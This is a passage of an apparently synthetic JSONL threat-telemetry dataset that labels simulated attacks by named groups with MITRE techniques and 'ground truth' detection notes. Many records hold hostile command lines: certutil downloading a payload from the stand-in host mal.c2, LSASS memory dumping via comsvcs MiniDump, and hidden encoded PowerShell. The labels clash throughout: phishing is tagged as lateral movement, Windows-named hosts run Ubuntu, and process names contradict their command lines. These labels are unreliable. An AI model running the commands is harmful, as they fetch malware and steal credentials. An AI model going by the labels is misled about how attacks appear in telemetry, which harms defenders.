-nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-12-11T13:29:42.000Z","user":{"name":"arn:aws:iam::mettyekn9k02","sid":"S-1-5-21-512102129-473592781-3113"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Lateral Movement","Discovery"],"technique_id":"T1566.001"},"event_id":"evt_volttyphoon_20260518T130848000Z_0007449","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.184.84.226","name":"WIN-FIN-SRV-S4FVXV5EEI","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7449Volt TyphoonT1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.144.65.248","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-08-02T03:54:32.000Z","user":{"name":"i-q34550u9pvpy","sid":"S-1-5-21-970789515-205386627-9237"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Persistence","Lateral Movement"],"technique_id":"T1566.001"},"event_id":"evt_scatteredspider_20250902T052849000Z_0007451","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["TLS","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.186.238.14","name":"EC2-INST-CMPR8XDSF0","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7451Scattered SpiderT1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.194.227.99","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-07-03T11:46:23.000Z","user":{"name":"svc_0l28lcbjr21n","sid":"S-1-5-21-312541511-754736723-7844"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Initial Access"],"technique_id":"T1546.003"},"event_id":"evt_apt41_20250413T094054000Z_0007453","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.96.120.217","name":"AZURE-VM-7182UF3EKO","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7453APT41T1546.003"},"network":{"domain":"github.com","dst_ip":"1.148.67.247","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1784 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-05-07T16:52:35.000Z","user":{"name":"svc_728r673prmxr","sid":"S-1-5-21-815353013-487669685-8013"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Lateral Movement"],"technique_id":"T1021.006"},"event_id":"evt_mustangpanda_20261025T065750000Z_0007455","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.109.182.19","name":"AZURE-VM-0PTINZ3BP2","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7455Mustang PandaT1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.153.136.135","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-09-23T11:04:06.000Z","user":{"name":"arn:aws:iam::czv9rrqpt4l1","sid":"S-1-5-21-570555040-125070668-2444"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Privilege Escalation"],"technique_id":"T1098.004"},"event_id":"evt_mustangpanda_20250619T141245000Z_0007457","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.110.228.1","name":"WIN-FIN-SRV-9F57NX4D46","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7457Mustang PandaT1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.53.34.14","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-02-07T04:53:34.000Z","user":{"name":"azuread\\j8l70ly471ym","sid":"S-1-5-21-706630059-451306246-7236"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Execution","Collection","Command and Control"],"technique_id":"T1546.003"},"event_id":"evt_unc4841_20260110T171910000Z_0007459","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.92.161.242","name":"WIN-FIN-SRV-SZH5ONWZWR","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7459UNC4841T1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.60.34.124","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-05-02T10:03:30.000Z","user":{"name":"svc_5znck6061ioe","sid":"S-1-5-21-776651754-216100963-3043"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Credential Access","Impact","Reconnaissance"],"technique_id":"T1071.001"},"event_id":"evt_apt41_20261003T084206000Z_0007461","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.153.130.71","name":"EC2-INST-15XUHF2WHJ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7461APT41T1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.137.145.138","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-01-26T07:25:07.000Z","user":{"name":"CORP\\6295j1cheo6n","sid":"S-1-5-21-896233982-873651378-1912"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Privilege Escalation","Exfiltration"],"technique_id":"T1098.004"},"event_id":"evt_apt41_20260604T083524000Z_0007463","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Base64","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.120.24.133","name":"AZURE-VM-LB9XFGMDU7","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7463APT41T1098.004"},"network":{"domain":"github.com","dst_ip":"1.104.22.94","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2073 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-04-08T14:57:55.000Z","user":{"name":"svc_p6y2rm7dg001","sid":"S-1-5-21-601912199-596861271-2293"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Privilege Escalation","Command and Control","Reconnaissance"],"technique_id":"T1546.003"},"event_id":"evt_scatteredspider_20251207T081614000Z_0007465","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.146.41.29","name":"EC2-INST-FGG6UP8OXX","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7465Scattered SpiderT1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.46.213.16","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-11-17T09:40:28.000Z","user":{"name":"arn:aws:iam::h8b96pxr3g3u","sid":"S-1-5-21-147200412-338906331-4545"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Discovery"],"technique_id":"T1566.001"},"event_id":"evt_volttyphoon_20260624T214813000Z_0007467","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.83.219.14","name":"WIN-FIN-SRV-GWRYP8HBJ6","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7467Volt TyphoonT1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.87.4.212","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1833 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-04-20T21:12:09.000Z","user":{"name":"svc_qcq6l8ihrbqz","sid":"S-1-5-21-343645339-191819737-3983"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Command and Control","Privilege Escalation"],"technique_id":"T1531"},"event_id":"evt_volttyphoon_20250208T190754000Z_0007469","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.173.179.239","name":"APP-WEB-QMGMKY3HUQ","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7469Volt TyphoonT1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.118.157.34","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2970 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-11-26T13:38:11.000Z","user":{"name":"azuread\\twi3lbsvlma9","sid":"S-1-5-21-538557343-787098449-6616"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Exfiltration"],"technique_id":"T1531"},"event_id":"evt_mustangpanda_20250417T044710000Z_0007471","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.31.221.188","name":"WIN-FIN-SRV-UB99E41SRJ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7471Mustang PandaT1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.63.205.155","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-08-24T16:54:15.000Z","user":{"name":"svc_hkg9rwtry9x4","sid":"S-1-5-21-558033144-365853552-8933"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Discovery"],"technique_id":"T1059.001"},"event_id":"evt_apt41_20261031T065729000Z_0007473","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.24.179.18","name":"AZURE-VM-RNNHFZGY82","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7473APT41T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.38.34.20","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-04-09T12:13:29.000Z","user":{"name":"CORP\\q51882mpkb3k","sid":"S-1-5-21-345953806-549111696-3899"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Execution","Credential Access","Defense Evasion"],"technique_id":"T1098.004"},"event_id":"evt_apt41_20260908T093631000Z_0007475","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.104.232.37","name":"IAM-ROLE-NQRI3WZMT2","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7475APT41T1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.51.116.131","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-01-12T15:37:31.000Z","user":{"name":"azuread\\cu20fuivpmwo","sid":"S-1-5-21-272295985-872528778-8923"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Defense Evasion"],"technique_id":"T1484.001"},"event_id":"evt_lapsus_20250815T153039000Z_0007477","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.250.17.238","name":"APP-WEB-DXX0V62JW6","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7477Lapsus$T1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.154.125.145","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-01-24T15:10:22.000Z","user":{"name":"azuread\\pmreqxe3kodc","sid":"S-1-5-21-557232323-616424031-4761"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Execution","Privilege Escalation","Initial Access"],"technique_id":"T1570"},"event_id":"evt_apt29_20251226T112132000Z_0007479","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.154.177.173","name":"WIN-FIN-SRV-M2Z7CANQ1W","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7479APT29T1570"},"network":{"domain":"github.com","dst_ip":"1.23.40.175","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"powershell.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-07-03T23:45:28.000Z","user":{"name":"svc_7tknkqcx1kl4","sid":"S-1-5-21-538900922-558296321-4112"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Impact"],"technique_id":"T1021.006"},"event_id":"evt_apt41_20250724T083043000Z_0007481","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.204.69.104","name":"WIN-FIN-SRV-EUW4YHAWH0","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7481APT41T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.57.82.90","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-03-24T08:00:28.000Z","user":{"name":"arn:aws:iam::coq247ib502h","sid":"S-1-5-21-704057159-858405884-2717"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Reconnaissance","Initial Access","Exfiltration"],"technique_id":"T1098.004"},"event_id":"evt_scatteredspider_20260118T193549000Z_0007483","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.245.55.243","name":"IAM-ROLE-YDPQDLYYM5","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7483Scattered SpiderT1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.159.6.71","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-09-06T00:29:08.000Z","user":{"name":"arn:aws:iam::d50n9yq3u5ee","sid":"S-1-5-21-787884577-232315503-4666"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Initial Access"],"technique_id":"T1546.003"},"event_id":"evt_apt29_20260801T174847000Z_0007485","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.46.72.24","name":"WIN-FIN-SRV-WTIGF6SLXI","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7485APT29T1546.003"},"network":{"domain":"github.com","dst_ip":"1.125.150.190","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-06-25T04:57:05.000Z","user":{"name":"azuread\\ln88exyelubt","sid":"S-1-5-21-235590920-317818244-5018"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Persistence","Defense Evasion","Discovery"],"technique_id":"T1071.001"},"event_id":"evt_apt41_20250518T125717000Z_0007487","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.148.247.144","name":"IAM-ROLE-UGS06UP8U3","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7487APT41T1071.001"},"network":{"domain":"github.com","dst_ip":"1.6.187.116","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2476 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-02-11T16:22:03.000Z","user":{"name":"azuread\\aoo9aow83u0x","sid":"S-1-5-21-978643075-991587114-5165"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Discovery","Impact","Reconnaissance"],"technique_id":"T1003.001"},"event_id":"evt_apt29_20260531T023001000Z_0007489","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.63.15.102","name":"WIN-FIN-SRV-RB9ENKRGAP","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7489APT29T1003.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.171.64.77","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2961 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-08-15T15:15:19.000Z","user":{"name":"i-fls24l5hs2xz","sid":"S-1-5-21-615976189-825320415-3904"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Defense Evasion","Execution"],"technique_id":"T1484.001"},"event_id":"evt_scatteredspider_20251222T184815000Z_0007491","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.159.204.45","name":"DB-ORACLE-ALC49EWO3D","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7491Scattered SpiderT1484.001"},"network":{"domain":"github.com","dst_ip":"1.107.106.231","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1778 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-09-27T16:15:07.000Z","user":{"name":"azuread\\ya0nmnbqbnry","sid":"S-1-5-21-821986930-772852483-7542"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Impact","Persistence","Command and Control"],"technique_id":"T1531"},"event_id":"evt_fin7_20250508T093552000Z_0007493","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.221.51.96","name":"APP-WEB-2CQLB76XUJ","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7493FIN7T1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.141.241.20","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-11-03T02:16:30.000Z","user":{"name":"azuread\\bbkm9or2monw","sid":"S-1-5-21-200740894-957661953-4031"}} |
